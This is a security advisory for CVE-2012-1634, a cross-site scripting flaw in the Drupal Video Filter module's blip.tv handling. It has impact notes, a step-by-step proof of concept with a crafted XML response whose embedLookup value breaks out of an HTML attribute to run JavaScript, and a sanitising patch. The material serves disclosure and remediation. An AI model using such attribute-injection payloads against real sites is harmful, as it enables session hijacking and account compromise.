Drupal Video Filter 6.x-2.8 XSS Vulnerability

12 January 2012

CVE: CVE-2012-1634

Description of Vulnerability:

Drupal (http://drupal.org) is a robust content management system (CMS) written in PHP and MySQL. The Drupal Video Filter module (http://drupal.org/project/video_filter) "is a highly flexible and easy extendable filter module to embed any type of video in your site using a simple tag. Other modules can add video sites/formats (called codecs) using an easy plug-in architecture." The Video Filter module contains an arbitrary HTML injection vulnerability (also known as cross site scripting, or XSS) due to the fact that it fails to user supplied third party data before display.

Systems affected:

Drupal 6.22 with Video Filter 6.x-2.8 was tested and shown to be vulnerable

Impact

Attackers could inject arbitrary scripts into pages affecting site users. This could result in administrative account compromise leading to web server process compromise. A more likely scenario would be for an attacker to inject hidden content (such as iframes, applets, or embedded objects) that would attack client browsers in an attempt to compromise site users' machines. This vulnerability could also be used to launch cross site request forgery (XSRF) attacks against the site that could have other unexpected consequences.

Mitigating factors:

In order to exploit this vulnerability the attacker must be able to either control the source of third party data or manipulate it in transit. This could be accomplished with a man in the middle (MITM) attack. Certain HTTP responses need to contain malicious code for this exploitation, which could be accomplished by modifying data on the wire (or over wireless). Furthermore, this flaw only affects videos rendered using the video_filter_bliptv() function. Because the module makes requests as nodes are rendered (and cached) the XSS is transient and will only survive the lifetime of the cache unless the attacker can maintain control of, or manipulate, the source of the HTTP response from the URL specified in the video field tag in the Drupal node text.

Proof of concept exploit:

1. Install Drupal 6-22, Video Filter 6.x-2.8
2. In order to save the hassle of actually setting up a malicious proxy or evil website simply manually manipulate the $result->data variable crafted out of the drupal_http_request from line 307 of video_filter.codecs.inc. Add the following PHP on the blank line 308. This is a valid response altered to include a malicious embedLookup tag value :

$result->data = <<<EOD
<response>
	<current_time>2011-10-03T17:14:32Z</current_time>
	<timestamp>1317662072501</timestamp>
	
<status>OK</status>
<payload>

<asset lang="en">
	<id>127139</id>

	<item_type>file</item_type>
	<item_id>123456</item_id>
	<guid>44C681A8-97D8-11DB-9C2C-80C8F4A79447</guid>
	<deleted>false</deleted>
	
	<modified>1167464642774</modified>
	
	<title>Klog - Episode 13</title>

	<links>
		<link rel="alternate" type="text/html" href="http://blip.tv/file/123456" />
		<link rel="alternate" type="text/xml" href="http://blip.tv/file/123456/?skin=api" />
		<link rel="service.edit" type="text/html" href="http://blip.tv/file/post/123456/" />
		<link rel="alternate" type="application/rss+xml" href="http://blip.tv/rss/127139" />
		<link rel="alternate" type="application/atom+xml" href="http://blip.tv/file/123456/?skin=atom" />
		<link rel="service.edit" type="text/xml" href="http://blip.tv/file/post/123456/?skin=api" />
	</links>
	<timestamp>1167464106018</timestamp>

	<latitude></latitude>
	<longitude></longitude>
	<explicit>false</explicit>
	<license>
		<name>No license (All rights reserved)</name>
		
	</license>
	<createdBy>
		<login>lotusreaver</login>

		<uid>7970</uid>
		<links>
			<link type="text/html" href="http://blip.tv/users/view/lotusreaver" />
			<link type="application/rdf+xml" href="http://blip.tv/users/view/lotusreaver" />
			<link type="application/rss+xml" href="http://lotusreaver.blip.tv/rss" />
			<link type="application/rss+atom" href="http://lotusreaver.blip.tv/posts/?skin=atom" />
		</links>
	</createdBy>

	<description mode="escaped" type="text/html"></description>
	<notes mode="escaped" type="text/html"></notes>
	<tags>
		
	</tags>
	<mediaList>
		
		<media>
			<role>Source</role>
			<link type="video/ms-wmv" href="http://blip.tv/file/get/Lotusreaver-KlogEpisode13172.wmv" />

			<width>320</width>
			<height>240</height>
			<duration>393</duration>
			<videocodec>wmv9dmo</videocodec>
			<audiocodec>ffwmav2</audiocodec>
			<bitrate></bitrate>

			<audiobitrate>64</audiobitrate>
			<videobitrate>0</videobitrate>
			<size>23892133</size>
		</media>
		
		<media>
			<role>web</role>
			<link type="video/x-flv" href="http://blip.tv/file/get/Lotusreaver-KlogEpisode13172.flv" />

			<width>320</width>
			<height>240</height>
			<duration>393</duration>
			<videocodec></videocodec>
			<audiocodec></audiocodec>
			<bitrate></bitrate>
			<audiobitrate>0</audiobitrate>

			<videobitrate>0</videobitrate>
			<size>22951160</size>
		</media>
		
	</mediaList>
	
	
	<darkMeta><![CDATA[
		
	]]></darkMeta>
	<embedLookup>AYfiBwI" onMouseOver="javascript:alert('xss');</embedLookup>
	<embedUrl type="application/x-shockwave-flash">http://blip.tv/play/AYfiBwI</embedUrl>

	<embedCode><iframe src="http://blip.tv/play/AYfiBwI.html" width="480" height="390" frameborder="0" allowfullscreen></iframe><embed type="application/x-shockwave-flash" src="http://a.blip.tv/api.swf#AYfiBwI" style="display:none"></embed></embedCode>

</asset>

</payload>


</response>
	
EOD;
3. Install the Video Filter module and enable it
4. Apply the video filter to content types at ?q=admin/settings/filters by clicking 'configure' and checking the checkbox next to "Video Filter"
5. Create a new piece of content using the input form at from step 4 at ?q=node/add/story (for example, creating a new Story node).
6. In the body include the text "[video:http://blip.tv/file/123456]"
7. Save the node, then mouse over the video to execute the Javascript alert box.

Patch:

Applying the following patch mitigates this issue in version 6.x-2.8

--- video_filter/video_filter.codecs.inc	2011-03-16 17:31:00.000000000 -0400
+++ video_filter.fixed/video_filter.codecs.inc	2011-10-01 16:25:08.486554250 -0400
@@ -337,7 +337,7 @@ function video_filter_bliptv($video) {
         $start_level--;
       }
     }
-    $id = $response['EMBEDLOOKUP'][0];
+    $id = ereg_replace("[^A-Za-z0-9]", "", $response['EMBEDLOOKUP'][0]);
   }
   
   $video['source'] = 'http://blip.tv/play/' . $id;